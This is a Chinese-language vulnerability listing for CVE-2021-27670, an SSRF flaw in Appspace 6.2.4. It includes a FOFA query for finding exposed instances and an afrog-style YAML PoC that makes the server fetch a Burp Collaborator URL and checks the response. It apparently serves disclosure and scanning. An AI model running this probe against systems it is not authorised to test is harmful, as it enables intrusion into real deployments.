CVE-2021-27670: Appspace jsonprequest SSRF漏洞

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。 fofa-query: "Sign-in-to-Appspace-Core"

PoC代码[已公开]

id: CVE-2021-27670

info:
  name: Appspace jsonprequest SSRF漏洞
  author: daffainfo
  severity: high
  description: |
    Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。
    fofa-query: "Sign-in-to-Appspace-Core"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Appspace%20jsonprequest%20SSRF%E6%BC%8F%E6%B4%9E%20CVE-2021-27670.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27670
  tags: cve,cve2021,appspace,ssrf
  created: 2023/07/13

rules:
  r0:
    request:
      method: GET
      path: /api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http%3a%2f%2fkui5ntipd353w4eekwtxhc5af1lu9oxe158ywn.burpcollaborator.net%3f
    expression: response.status == 200 && response.body.bcontains(b'dlgnon6ksjta2ya1tg7gq2zjlgmgiwjzlgz')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-27670.yaml